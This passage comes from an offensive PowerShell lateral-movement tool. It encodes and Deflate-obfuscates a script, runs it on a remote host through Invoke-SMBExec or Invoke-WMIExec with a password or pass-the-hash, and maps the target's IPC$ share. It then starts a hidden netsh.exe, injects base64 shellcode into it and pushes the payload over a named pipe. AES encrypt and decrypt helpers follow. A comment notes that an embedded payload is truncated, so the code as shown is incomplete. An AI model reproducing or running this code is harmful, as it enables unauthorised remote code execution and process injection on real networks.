# Same two encodings as the remote Invoke-MK branch : $payloadraw ( -v 2 -e ) for WMI , $payload ( Deflate + -exec bypass ) for SMB .
$Bytes = [ System.Text.Encoding ] :: Unicode . GetBytes ( $pipekat )
$payloadraw = 'cmd /c powershell -v 2 -e ' + [ Convert ] :: ToBase64String ( $bytes )
$ScriptBytes = ( [ Text.Encoding ] :: ASCII ) . GetBytes ( $pipekat )
$CompressedStream = New-Object IO . MemoryStream
$DeflateStream = New-Object IO . Compression . DeflateStream ( $CompressedStream , [ IO.Compression.CompressionMode ] :: Compress )
$DeflateStream . Write ( $ScriptBytes , 0 , $ScriptBytes . Length )
$DeflateStream . Dispose ( )
$CompressedScriptBytes = $CompressedStream . ToArray ( )
$CompressedStream . Dispose ( )
$EncodedCompressedScript = [ Convert ] :: ToBase64String ( $CompressedScriptBytes )
$NewScript = 'sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(' + " ' $EncodedCompressedScript ' " + '),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()'
$payload = " cmd /c powershell -exec bypass -c `" `" $NewScript `" `" "
if ( $PSexec ) {
$smbexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $smbexec ) )
IEX $smbexecw
echo " `n [+] Running Invoke-SMBExec with the supplied credentials "
if ( $hash ) {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payload `" "
} else {
$smbcmd = " Invoke-SMBExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payload `" "
}
$success = IEX $smbcmd
$success
} else {
$wmiexecw = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $wmiexec ) )
IEX $wmiexecw
echo " `n [+] Running Invoke-WMIExec with the supplied credentials "
if ( $hash ) {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Hash `" $hash `" -Command `" $payloadraw `" "
} else {
$wmicmd = " Invoke-WmiExec -Target `" $target `" -Domain `" $domain `" -Username `" $username `" -Password `" $password `" -Command `" $payloadraw `" "
}
$success = IEX $wmicmd
$success
}
# example shellcode that runs netsh.exe
# $Shellcode = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1W5ldHNoLmV4ZQA="
if ( $success -like " *Command executed* " ) {
# Script for the input pipe = decoded $invokeshellcode + the tail below , which starts netsh.exe hidden
# ( the Syswow64 copy unless PROCESSOR_ARCHITECTURE is x86 ) and calls Invoke-Fsd with the base64 shellcode .
# NOTE(review): both arms of the architecture check decode the same `$ sc32 ; only the netsh path differs .
$sc32 = @"
`$ sc32 = " $Shellcode "
`$ pst = New-Object System . Diagnostics . ProcessStartInfo
`$ pst . WindowStyle = 'Hidden'
`$ pst . UseShellExecute = `$ False
`$ pst . CreateNoWindow = `$ True
if ( `$ env : PROCESSOR_ARCHITECTURE -eq " x86 " ) {
`$ t2 = [ Convert ] :: FromBase64String ( `$ sc32 )
`$ pst . FileName = " C:\Windows\System32\netsh.exe "
} else {
`$ pst . FileName = " C:\Windows\Syswow64\netsh.exe "
`$ t2 = [ Convert ] :: FromBase64String ( `$ sc32 )
}
`$ Process = [ System.Diagnostics.Process ] :: Start ( `$ pst )
`$ Process . Id
Invoke-Fsd -ProcessID `$ Process . Id -Shellcode `$ t2
" @
# NOTE(review): $invokeshellcode is truncated on this page , so FromBase64String would throw here .
$mkun = [ System.Text.Encoding ] :: UTF8 . GetString ( [ System.Convert ] :: FromBase64String ( $invokeshellcode ) )
$mkun + = $sc32
$Bytes = [ System.Text.Encoding ] :: UTF8 . GetBytes ( $mkun )
$ed = [ Convert ] :: ToBase64String ( $Bytes )
# SMB session to the target's IPC$ share with the supplied password ( never removed ) , as in the remote Invoke-MK branch .
if ( $domain -eq " . " ) {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $username " , " $Password " )
} else {
$net = new-object -ComObject WScript . Network
$net . MapNetworkDrive ( " " , " \\ $target \ipc $ " , $false , " $domain \ $username " , " $Password " )
}
# Write the script to the input pipe ; nothing is read back .
try {
add-Type -assembly " System.Core "
$p = new-object System . IO . Pipes . NamedPipeClientStream ( $target , $pipeName ) ;
$w = new-object System . IO . StreamWriter ( $p )
$p . Connect ( $TimeoutMS ) ;
$w . WriteLine ( $ed ) ;
$w . Dispose ( ) ;
$p . Dispose ( ) ;
} catch {
echo " Failed conecting to named pipe: $target : $pipeName "
}
} else { echo " Failed to run WMI/SMBEXEC " }
}
}
function Random-Pipe
{
    # Builds a random string of $Length lowercase letters / digits; used for the
    # per-run named-pipe names. Get-Random is not a cryptographic RNG, which is
    # fine here: the name is an identifier, not a secret.
    # $Length <= 0 yields ''.
    param (
        [int] $Length
    )
    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
    $name = ''
    $remaining = $Length
    while ($remaining -gt 0) {
        $name += ($alphabet | Get-Random)
        $remaining--
    }
    return $name
}
# creates a random AES managed object
function Create-AesManagedObject
{
    # Returns a RijndaelManaged configured as AES-256 in CBC mode with zero padding.
    # $key / $IV may each be a base64 string (decoded here) or a raw byte array;
    # either may be omitted, in which case that property is left as the object
    # initialised it. Zero padding with no MAC: the ciphertext is neither
    # length-preserving nor integrity-protected. The same definition is duplicated
    # inside the here-strings sent to the target, so a change here does not reach
    # the remote side.
    param
    (
        [Object] $key,
        [Object] $IV
    )
    $cipher = New-Object -TypeName 'System.Security.Cryptography.RijndaelManaged'
    $cipher.Mode      = [System.Security.Cryptography.CipherMode]::CBC
    $cipher.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $cipher.BlockSize = 128
    $cipher.KeySize   = 256
    if ($IV) {
        if ($IV.getType().Name -eq 'String') { $IV = [System.Convert]::FromBase64String($IV) }
        $cipher.IV = $IV
    }
    if ($key) {
        if ($key.getType().Name -eq 'String') { $key = [System.Convert]::FromBase64String($key) }
        $cipher.Key = $key
    }
    $cipher
}
# creates a random AES symmetric encryption key
function Create-AesKey ( )
{
    # Asks a freshly configured AES-256 object for a new key and returns it
    # base64-encoded. The caller echoes this key to the console.
    $cipher = Create-AesManagedObject
    $cipher.GenerateKey()
    $encodedKey = [System.Convert]::ToBase64String($cipher.Key)
    $encodedKey
}
# encryption utility using Rijndael encryption, an AES equivalent, returns encrypted base64 block
function Encrypt-String
{
    # Encrypts the UTF-8 bytes of $unencryptedString under $key (base64 string or
    # byte array) and returns base64( IV || ciphertext ). No IV is passed in, so the
    # IV is whatever the new cipher object holds; Decrypt-String reads it back from
    # the first 16 bytes. Zero padding means trailing NUL bytes of the plaintext
    # cannot be distinguished from padding.
    param
    (
        [Object] $key,
        [Object] $unencryptedString
    )
    $plain  = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
    $cipher = Create-AesManagedObject $key
    $body   = $cipher.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)
    [byte[]] $framed = $cipher.IV + $body
    [System.Convert]::ToBase64String($framed)
}
# decryption utility using Rijndael encryption, an AES equivalent, returns unencrypted UTF8 data
function Decrypt-String
{
    # Inverse of Encrypt-String: base64-decodes $encryptedStringWithIV, takes the
    # first 16 bytes as the IV, decrypts the rest under $key and returns the UTF-8
    # text with trailing NUL (zero-padding) characters trimmed. There is no
    # integrity check, so a tampered or truncated input yields garbage or throws.
    param
    (
        [Object] $key,
        [Object] $encryptedStringWithIV
    )
    $framed = [System.Convert]::FromBase64String($encryptedStringWithIV)
    $ivLen  = 16
    $iv     = $framed[0..($ivLen - 1)]
    $cipher = Create-AesManagedObject $key $iv
    $plain  = $cipher.CreateDecryptor().TransformFinalBlock($framed, $ivLen, $framed.Length - $ivLen)
    [System.Text.Encoding]::UTF8.GetString($plain).Trim([char] 0)
}